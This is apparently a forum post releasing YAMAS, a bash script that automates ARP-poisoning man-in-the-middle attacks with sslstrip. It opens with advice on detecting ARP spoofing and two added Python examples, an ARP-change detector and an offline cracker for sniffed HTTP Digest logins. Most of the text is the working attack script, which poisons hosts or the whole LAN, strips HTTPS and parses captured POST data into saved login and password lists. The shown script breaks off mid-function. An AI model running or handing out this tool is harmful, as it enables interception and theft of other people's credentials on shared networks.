LAN network sniffer: YAMAS (Yet Another MITM Automation Script) is a fully automated MITM attack tool.
Note: you need arpspoof, sslstrip and a few other dependencies (nmap, xterm, iptables, and ettercap if you use the -e switch) installed to make it work (everything is already available on BackTrack).
---
So this script performs a MITM attack. But how do you protect yourself from this kind of thing?
How to protect yourself from Man-in-the-Middle attacks --
The vector Yamas uses is poisoning of the victim's ARP cache. ARP is the protocol that maps IP addresses to physical MAC addresses on the local network. When a device wants to reach the router, it asks for the MAC of the router's IP, e.g. "Who has 192.168.1.1? Tell 192.168.1.2". The router answers "192.168.1.1 [router] is at 11:22:33:44:55:66 [router]", and the client writes that into its ARP cache. This is where we come into play: we send spoofed ARP replies, "192.168.1.1 [router] is at 00:11:22:66:66:66 [attacker]", and the client updates its cache so that the attacker is now "the router". ARP has no authentication at all, so nothing stops a host from answering for an address it does not own, and the most recent reply wins. We then forward the traffic to the real router, which lets us read and manipulate it on the fly. That is how we get the passwords: thanks to sslstrip, the client is kept on plain HTTP instead of being redirected to HTTPS, so the credentials are sent in clear text and we simply read them.
All right, but how do you keep this from happening to you?
When you are a client - a website visitor - there are two things you can do: use programs, and/or use your head. Program-wise, you want one that regularly checks the ARP table for changes and warns you about suspicious ones: the gateway's IP suddenly mapped to a new MAC, or one MAC answering for several IPs. Well-known ones include ArpON and arpwatch. Without any tool, "ip neigh" on Linux or "arp -a" on Linux and Windows shows the current table, and the MAC listed for the gateway should match the one printed on your router.
You could also use ettercap under *nix or Wireshark on any platform: even though it is not their job and they will not run all the time, they will warn you about duplicate ARP replies giving different MAC addresses for the same IP (Wireshark flags these as "Duplicate IP address detected"). Some internet security suites do the same, but I won't do free advertising for them, so you'll have to find them with your friend Google.
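As an added example (it is not part of YAMAS or of the text above), here is the check those ARP watchers perform, written in Python over a constructed tcpdump-style capture of ARP replies that replays the exchange described above: the attacker's MAC (00:11:22:66:66:66) suddenly answering for the router (192.168.1.1) and then for the victim. The capture text and all addresses are made up; the line format is the one "tcpdump -n arp" prints. Nothing is sent on the network.

```python
#!/usr/bin/env python3
"""ARP-poisoning detector over a stream of ARP replies (added example, not YAMAS code).

The check is the one arpwatch/ArpON-style tools make: remember which MAC answered
for each IP, and alert when an IP is re-announced with a different MAC, or when one
MAC ends up claiming several IPs (full-duplex poisoning of router and victim).
Input lines follow "tcpdump -n arp" output.
"""
import re
import sys
from collections import defaultdict

# Constructed capture (made-up addresses): normal replies, then the two spoofed
# ones arpspoof sends so that router and victim both "are at" the attacker.
SAMPLE_CAPTURE = """\
12:00:01.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.2, length 28
12:00:01.000400 ARP, Reply 192.168.1.1 is-at 11:22:33:44:55:66, length 46
12:00:02.000000 ARP, Reply 192.168.1.2 is-at aa:bb:cc:dd:ee:01, length 46
12:00:03.000000 ARP, Reply 192.168.1.7 is-at 00:11:22:66:66:66, length 46
12:00:10.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:66:66:66, length 46
12:00:10.000100 ARP, Reply 192.168.1.2 is-at 00:11:22:66:66:66, length 46
""".splitlines()

ARP_REPLY = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_reply(line):
    """Return (ip, mac) for an ARP reply line, None for requests and other lines."""
    m = ARP_REPLY.search(line)
    return (m.group(1), m.group(2).lower()) if m else None


class ArpMonitor:
    def __init__(self):
        self.ip_to_mac = {}                 # last MAC seen answering for each IP
        self.mac_to_ips = defaultdict(set)  # every IP each MAC has answered for
        self.alerts = []

    def observe(self, ip, mac):
        """Record one reply; return the alerts it triggered (possibly none)."""
        new = []
        old = self.ip_to_mac.get(ip)
        if old is not None and old != mac:
            # Same IP, new MAC: exactly what a spoofed "is-at" reply looks like.
            new.append(("changed", ip, old, mac))
        self.ip_to_mac[ip] = mac
        if ip not in self.mac_to_ips[mac]:
            self.mac_to_ips[mac].add(ip)
            if len(self.mac_to_ips[mac]) > 1:
                # One NIC answering for several IPs: the attacker impersonating both ends.
                new.append(("multi-ip", mac, tuple(sorted(self.mac_to_ips[mac]))))
        self.alerts.extend(new)
        return new


def scan(lines):
    """Feed a sequence of tcpdump lines through the monitor; return all alerts."""
    mon = ArpMonitor()
    for line in lines:
        reply = parse_reply(line)
        if reply:
            mon.observe(*reply)
    return mon.alerts


if __name__ == "__main__":
    # Live use on the host you want to protect:  tcpdump -l -n arp | python3 arpmon.py -
    source = sys.stdin if sys.argv[1:] == ["-"] else SAMPLE_CAPTURE
    mon = ArpMonitor()
    for line in source:
        reply = parse_reply(line)
        if reply:
            for alert in mon.observe(*reply):
                print("ALERT", *alert)
```

Two things to know before trusting it: a DHCP lease moving to another machine or a replaced network card also produces a "changed" alert, so treat it as a prompt to look, not proof; and arpspoof with -t sends its replies unicast to the target, so a monitor on a third host only sees them when the whole network is targeted (broadcast). Run it on the machine you care about, or on a mirror port.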
In the end, it is mostly a question of habits, of using your head and knowing your environment: never, ever enter any [important] credential over an untrusted connection such as a public hotspot or open wifi, under any circumstances. Always check that the connection to the website is really secure: the address bar shows https://, the certificate is valid, up to date and issued to the site you think you are on, and the connection uses TLS (SSLv3 and earlier are broken and should be refused). Keep in mind that sslstrip works precisely by holding you on plain http:// so that no certificate warning ever appears: a login page without the padlock is the symptom, not a warning dialog.
Since you are here, you probably use this attack yourself, so you should be able to recognise the glitches it causes: having to reload the page? Page looks weird? Takes a long time to load? Disconnected when you didn't ask for it? Pay attention, you may be under attack!
If you have any doubt, just don't send anything sensitive over the network. It may seem obvious, but that is how you really protect yourself.
On the server side, I either don't know much about it, or there's not much that I know of to do. Well, here's what you can do: use an encrypted connection through SSL (but that sometimes costs, and I wouldn't pay for that...), or have the password hashed before it is sent! This can be done with .htaccess by using AuthType Digest. With Digest authentication the browser does not send the password but an MD5 hash of username, realm and password mixed with a nonce chosen by the server: what crosses the network can be sniffed, but it cannot be replayed once the nonce expires, and the password can only be recovered by guessing candidates, hashing each one the same way and comparing, which succeeds only if the password is weak (MD5 is fast, so a dictionary attack runs at millions of guesses per second). Two caveats: Digest protects the login exchange only, not the cookies and pages that follow, and an active attacker like this script can rewrite the server's challenge from Digest to Basic and receive the password in clear. The real server-side fix is serving the whole site over TLS and sending an HTTP Strict Transport Security header, so the browser refuses the plain-HTTP downgrade that sslstrip depends on. I know I wouldn't waste time cracking an MD5 password...
I'll try to add a module here to show that. Meanwhile you can head over to maemo's website, which uses this technique, and sniff the network while doing so.
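An added example, not the module the author mentions and not code from this page: the Digest computation as RFC 2617 specifies it with qop=auth (the variant Apache's mod_auth_digest uses), a constructed Authorization header of the kind sslstrip would log, and the offline dictionary attack an attacker runs against it. The user names, realm, nonces, wordlist and passwords are made up; the only real vector is the RFC 2617 worked example, used to check the implementation.

```python
#!/usr/bin/env python3
"""HTTP Digest authentication (RFC 2617, qop=auth) and why a sniffed exchange is
still worth attacking (added example, not YAMAS code).

The password never crosses the wire, only MD5(HA1:nonce:nc:cnonce:qop:HA2) with
HA1 = MD5(user:realm:password). Every other input to that formula is in the sniffed
header, so an attacker can guess passwords offline at MD5 speed and compare.
"""
import hashlib
import re


def md5hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """The 'response' field as the browser computes it (RFC 2617 section 3.2.2.1)."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def build_header(username, realm, password, method, uri, nonce, nc, cnonce):
    """What sslstrip would log for a Digest login: note the password is absent."""
    resp = digest_response(username, realm, password, method, uri, nonce, nc, cnonce)
    return (f'Authorization: Digest username="{username}", realm="{realm}", '
            f'nonce="{nonce}", uri="{uri}", qop=auth, nc={nc}, '
            f'cnonce="{cnonce}", response="{resp}"')


# key="quoted value" or key=bare (nc and qop are sent unquoted)
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_header(header):
    """Split a Digest header into its fields; enough for the fields used here."""
    return {k: (q if q else b) for k, q, b in _KV.findall(header)}


def crack_digest(header, method, wordlist):
    """Offline dictionary attack on a sniffed header: return the password or None."""
    f = parse_header(header)
    for guess in wordlist:
        r = digest_response(f["username"], f["realm"], guess, method, f["uri"],
                            f["nonce"], f["nc"], f["cnonce"], f.get("qop", "auth"))
        if r == f["response"]:
            return guess
    return None


# Constructed data: made-up accounts, realm, nonces and a toy wordlist.
WORDLIST = ["123456", "password", "qwerty", "letmein", "monkey", "dragon"]
NONCE, CNONCE, NC = "5f1a2b3c4d5e6f70", "0a4f113b", "00000001"
WEAK = build_header("alice", "members", "letmein", "POST", "/login", NONCE, NC, CNONCE)
STRONG = build_header("bob", "members", "correct horse battery staple 9!",
                      "POST", "/login", NONCE, NC, CNONCE)

if __name__ == "__main__":
    print(WEAK)
    print("alice:", crack_digest(WEAK, "POST", WORDLIST))     # letmein
    print("bob:", crack_digest(STRONG, "POST", WORDLIST))     # None
```

The sniffed header carries the method only implicitly (it is the request line of the same POST, which sslstrip logs too), which is why crack_digest takes it as a parameter. Swap the toy wordlist for a real one and the loop is the whole attack; with the user's password in a common wordlist, Digest bought nothing except that the attacker has to spend a second of CPU.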
Edit : This is not the latest available version, go and grab it at http://comax.fr/
#!/bin/bash
# Bash script to launch a man in the middle attack and sslstrip.
# version 0.9 by comaX
version="0.9.4"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup() {
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ ${looparseid} != "" ]]; then kill ${looparseid}
fi
if [[ ${sslstripid} != "" ]]; then kill ${sslstripid}
fi
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
killall arpspoof ettercap 2>/dev/null # "$1"/"$2" inside a function are its own arguments, not the script's, so kill whichever poisoner is running
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
rm /tmp/looparse.sh
fi
if [ -e '/tmp/grepcred.txt' ]; then
rm /tmp/grepcred.txt
fi
echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}
#Let's define some arguments that can be passed to the script :
if [[ "$1" = "-p" || "$1" = "--parse" ]]; then #parse a given filename
if [[ $2 == "" ]]; then
echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
exit 0
fi
clear
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
echo -e "Parsing $2 for credentials.\n\n"
cat "$2" |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq
rm /tmp/grepcred.txt
exit 0
fi
if [[ "$1" = "-e" || "$2" = "-e" ]]; then
echo -e "\tYou will be using Ettercap instead of ARPspoof."
sleep 0.5
fi
if [[ "$1" = "-h" || "$1" = "--help" ]]; then #define help message
clear
echo -e "You are running $0, version $version.
usage : $0 [-h -c -p]* [-e -s]**
-h or --help : Display this help message, disclaimer and exit.
-c or --change: Display changelog and todo.
-e : Use ettercap instead of ARPspoof. One might have one's reasons...
ARPspoof is default.
-p or --parse : Only parse the given <file>. Don't use wildcards.
Use > /output_file to print to a file.
-s : The script won't download anything. Make sure you have the needed files.
*Must be used alone
**Can be used at the same time.
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.
\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0
fi
if [[ "$1" = "-c" || "$1" = "--change" ]]; then #Changelog
clear
echo -e "\033[31m Changelog :\033[m
Should be added in next version/revision :
- Submit your ideas !
- We're close to a final version !
Added in v0.9.x
- Ettercap support (with -e switch in parameters)
- Silent mode (-s)
- Code enhancing.
Added in v0.8.x
- Tail-greping log file so we can be sure there is traffic being sniffed
- New parsing method from scratch : should be lighter, less CPU consuming, and most of all, outputs websites as well.
This should be tested though to ensure maximum reliability. Please report back !
0.8.5 : now grep from downloaded file, to allow more updates on parsing, without updating the whole script.
- New -p option to allow only parsing a file. (v0.8.5)
- More improvements.
- Catching ^C and cleanup before quitting. (v0.8.5)
- Realtime parsing menu. (V0.8.5)
\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Install sslstrip if needed.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.
Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at [email protected]"
exit
fi
### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
message="\nNo message to display : you are running in silent mode"
else
wget -q http://comax.fr/yamas/bt5/message -O /tmp/message
message=$(cat /tmp/message) #store it to variable
rm /tmp/message #remove temp message file
fi
### Check for updates !
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for a new version : silent mode."
else
wget -q http://comax.fr/yamas/bt5/version -O /tmp/version # Get last version number
last_version=$(cat /tmp/version) #store it to variable
rm /tmp/version #remove temp version file
# NB : the version file and the script itself are fetched over plain HTTP with no signature check, so anyone
# who can MITM *you* can hand you a modified script. Use -s on networks you don't trust.
if [[ -n "$last_version" && "$(printf '%s\n' "$version" "$last_version" | sort -V | tail -n1)" != "$version" ]] ; then # version-aware compare (a plain string compare would rank 0.10 below 0.9)
echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)"
read update
if [[ $update = Y || $update = y ]] ; then
echo "[+] Updating script..."
wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
chmod +x $0
echo "[-] Script updated !"
if [[ $0 != '/usr/bin/yamas' ]] ; then
echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
read install
if [[ $install = Y || $install = y ]] ; then #do not proceed to install if using installed version : updating it already "installed" it over.
cp $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
echo "Script should now be installed, launching yamas !"
sleep 3
yamas
exit 1
else echo "Ok, continuing with updated version..."
sleep 3
$0
exit 1
fi
fi
sleep 2
$0
exit 1
else echo "Ok, continuing with current version..."
fi
else echo "No update available"
fi
fi
### End of update process
### Install process
if [[ ! -e '/usr/bin/yamas' ]] ; then
echo "Script is not installed. Do you want to install it ? (Y/N)"
read install
if [[ $install = Y || $install = y ]] ; then
cp -v $0 /usr/bin/yamas
chmod +x /usr/bin/yamas
rm $0
echo "Script should now be installed. Launching it !"
sleep 3
yamas
exit 1
else echo "Ok, not installing then !"
fi
else echo "Script is installed"
sleep 1
fi
### End of install process
clear
echo -e "
_______ _______ _______ _______ _______ _____
|\ /|( ___ )( )( ___ )( ____ \ |\ /|( __ ) / ___ \
( \ / )| ( ) || () () || ( ) || ( \/ | ) ( || ( ) | ( ( ) )
\ (_) / | (___) || || || || (___) || (_____ | | | || | / | ( (___) |
\ / | ___ || |(_)| || ___ |(_____ ) ( ( ) )| (/ /) | \____ |
) ( | ( ) || | | || ( ) | ) | \ \_/ / | / | | ) |
| | | ) ( || ) ( || ) ( |/\____) | \ / | (__) | _ /\____) )
\_/ |/ \||/ \||/ \|\_______) \_/ (_______)(_)\______/ " # <= I love it.
echo -e "===========================================================================
=\033[31m Welcome to Yet Another MITM Automation Script.\033[m =
=\033[31m Use this tool responsibly, and enjoy!\033[m =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version \033[32m$version\033[m =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo
# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."
# Defining exit function and other ending features
cleanup() {
echo
echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"
kill ${sslstripid} ${looparseid} 2>/dev/null
if [[ ${tailgrepid} != "" ]]; then kill ${tailgrepid}
fi
killall arpspoof ettercap 2>/dev/null # "$1"/"$2" inside a function are its own arguments, not the script's, so kill whichever poisoner is running
echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush # there are probably too many resets here,
iptables --table nat --flush # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm -f /tmp/looparse.sh # /tmp/grepcred.txt is still needed by the password parsing below ; it goes with the other temp files
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in /root/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
cp /tmp/$filename.txt /root/$filename.txt #moving file
if [ -f "/root/$filename.txt" ]; then #check if it exists
echo "Log file copied !" #it does
else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
fi
else echo "Logs not saved"
fi
echo
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
if [ ! -f /tmp/grepcred.txt ]; then # normally fetched by looparse.sh already ; absent in silent mode (a function's "$1" is not the script's, so test the file instead)
echo "'grepcred.txt' not found in /tmp, fetching it. (In silent mode, drop your own copy there beforehand or the parsing *will* fail.)"
wget -q http://comax.fr/yamas/bt5/grepcred.txt -O /tmp/grepcred.txt
fi
cat /tmp/$filename.txt |
awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -i -a -f /tmp/grepcred.txt |
awk -F "=" '{if (length($2) < 4) print "";
else if ($1 ~/Website/) print $0;
else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
else print "Login = \t"$2}' |
uniq >> /root/$filename.pass.txt # >> appends to a potential previous file.
if [ -f "/root/$filename.pass.txt" ]; then #check if it exists
echo "Passwords saved !" #it does
else echo "Error while saving passwords" #it does not
fi
else echo "Password saving skipped."
fi
rm -f /tmp/$filename.txt /tmp/grepcred.txt
echo -e "\nTemporary files deleted."
if [ -f "/usr/bin/yamas" ]; then #check if script is already installed
echo
echo
exit 1 #if yes, exit.
else
echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
read -e install
if [[ $install = "Y" || $install = "y" ]] ; then # (was "$install="y"", which bash parses as a single non-empty string and always succeeds)
cp "$0" /usr/bin/yamas #copy and rename script, whatever it was launched as
echo -e "\033[32m Script installed !\033[m"
else echo "Script not installed."
fi
fi
exit 1
}
updatestrip() {
wget -q http://www.thoughtcrime.org/software...rip-0.9.tar.gz
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install > /dev/null
cd ..
rm sslstrip-0.9.tar.gz
}
search=$(ip route show | awk '$1 != "default" { print $1; exit }') #store the first non-default route (LAN prefix, eg 192.168.1.0/24) for whole network mapping
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice. (Matched on the "default" keyword rather than a line number : ip route output order differs between versions.)
rescan () {
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -en "\033[m"
final
}
add_target() {
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}
ascii() {
clear
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "ASCII tables won't be available"
echo "ASCII tables are not available" > /tmp/ascii
else
wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
cat /tmp/ascii
rm /tmp/ascii
fi
final
}
tailsecure() {
xterm -geometry 50x50+10+10 -T "Tail-greping for secure references" -e "tail -f /tmp/$filename.txt | grep 'Resolving host:'" & tailgrepid=$!
final
}
rtparse() {
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
if [ "$rtp" = "1" ] ; then
echo -e "\033[33m[+]Pausing...\033[m"
kill -19 ${looparseid}
echo -e "\033[33m[-]Paused.\033[m"
rtparse
elif [ "$rtp" = "2" ] ; then
echo -e "\033[33m[+]Resuming...\033[m"
kill -18 ${looparseid}
echo -e "\033[33m[-]Resumed.\033[m"
rtparse
elif [ "$rtp" = "3" ] ; then
echo -e "\033[31m[+]Killing...\033[m"
kill ${looparseid}
echo -e "\033[33m[-]Killed.\033[m"
rtparse
elif [ "$rtp" = "4" ] ; then
echo -e "\033[32m[+]Launching...\033[m"
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
sleep 2
echo -e "\033[33m[-]Launched.\033[m"
rtparse
elif [ "$rtp" = "5" ] ; then
echo "Previous"
final
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
rtparse
fi
}
final() {
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Tail-grep hosts through output (make sure there is traffic).
5. Real-time parsing...
6. Quit properly.
Enter the number of the desired option."
read final
if [ "$final" = "1" ] ; then
rescan
elif [ "$final" = "2" ] ; then
add_target
elif [ "$final" = "3" ] ; then
ascii
elif [ "$final" = "4" ] ; then
tailsecure
elif [ "$final" = "5" ] ; then
rtparse
elif [ "$final" = "6" ] ; then
cleanup
else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
final
fi
}
###############################End of functions#############################
# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."
#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ] ; then
outport=8080
echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ] ; then
inport=80
echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"
#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ] ; then
filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"
#### BEGIN of update process ####
if [[ "$1" = "-s" || "$2" = "-s" ]]; then
echo "Not checking for updates here either. Sslstrip should be installed or attack will fail."
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
else
if [ -e '/usr/local/bin/sslstrip' ]; then # If sslstrip exists
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip version $sslversion is installed but a newer one (0.9) exists. Do you want to update \033[4mand\033[m install latest
version ? [Y/N]
Note that it will download it from the official website, but might be not supported by BT team on the forums as long as it's not in the repos. It
should be safe to use though."
read -e sslupdate
if [[ $sslupdate = "Y" || $sslupdate = "y" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
else echo -e "\033[33mOops, install failed.\033[m Continuing with current version."
fi
else echo "All right, continuing with current version."
fi
elif [[ $sslversion = "0.9" ]]; then
echo -e "\n\033[32mSslstrip is up to date, continuing...\033[m"
fi
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! # launch the installed copy : the version check above only decides which one we have, nothing started it
sleep 3
elif [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
sslversion=$(cat /pentest/web/sslstrip/sslstrip.py | grep "gVersion =" | awk -F \" ' {print $2} ') #store version to var
if [[ $sslversion < "0.9" ]]; then #if less than 0.9, ask to update
echo -e "Sslstrip v$sslversion was found, not installed, but executable. Do you want to \033[4mU\033[mpdate or \033[4mC\033[montinue ? "
read -e sslupdate
if [[ $sslupdate = "U" || $sslupdate = "u" ]] ; then #if yes, updating.
updatestrip
sslversion=$(cat /usr/local/bin/sslstrip | grep "gVersion =" | awk -F \" ' {print $2} ') #re-store version to var
if [[ $sslversion = "0.9" ]]; then echo -e "\n\033[32mInstall successful !\033[m"
sslstrip -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo -e "\033[33mOops, install failed.\033[m Continuing with current, non installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
else echo "All right, continuing with current, non-installed version."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
fi
fi
elif [ -e '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Sslstrip was found, but not installed and not executable. Making it executable... (not installing)"
chmod +x '/pentest/web/sslstrip/sslstrip.py'
if [ -x '/pentest/web/sslstrip/sslstrip.py' ]; then
echo "Now it is. Continuing..."
/pentest/web/sslstrip/sslstrip.py -f -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
sleep 3
else echo "Could not make sslstrip.py executable. Aborting."
exit 1
fi
else echo "Sslstrip couldn't be found. You might be using a wrong version of this script or it is not
installed.
You can download BT4r2 version of this script at http://tinyurl.com/mitm-yamas. To install sslstrip use
apt-get install sslstrip. Do you want to install it ? (will quit after) Y/N"
read apti
if [[ $apti = "Y" || $apti = "y" ]] ; then
apt-get install sslstrip
fi
exit 1 # nothing to strip with : don't go on and announce "Sslstrip is running"
fi
fi
sleep 2 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo
#Arpspoofing
echo
echo -e "\033[31m [+] Activating ARP cache poisoning... \033[m"
echo
ip route show | awk '$1 == "default" { print "Gateway :", $3," ", "Interface :", $5; exit }' #Output the default route user-friendly (matched on the keyword : line order varies between iproute2 versions)
default_iface=$(ip route show | awk '$1 == "default" { print $5; exit }')
default_gateway=$(ip route show | awk '$1 == "default" { print $3; exit }') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $default_gateway."
read -e gateway
if [ "$gateway" = "" ] ; then
gateway=$default_gateway #pressing enter set our var to null, fall back to the default route
echo -e "$gateway selected as default.\n"
fi
echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $default_iface."
read -e iface
if [ "$iface" = "" ] ; then
iface=$default_iface #default interface
echo -e "$iface selected as default.\n"
fi
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]] ; then
echo
echo -e "Do you want to map the network to show live hosts? (Y/N) [This might take up to 30 secs, be patient]"
read -e hosts
echo -e "\033[31m "
if [[ $hosts = "Y" || $hosts = "y" ]] ; then
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
echo -e "\033[m " # switch color back to white
else echo -e "\033[m "
fi
echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
shift
done
echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
}
ettercapi() { # We launch Ettercap in different xterm windows to keep script running
while [ "$1" != "" ]; do
xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp /$1/ /$gateway/ 2>/dev/null & sleep 2
shift
done
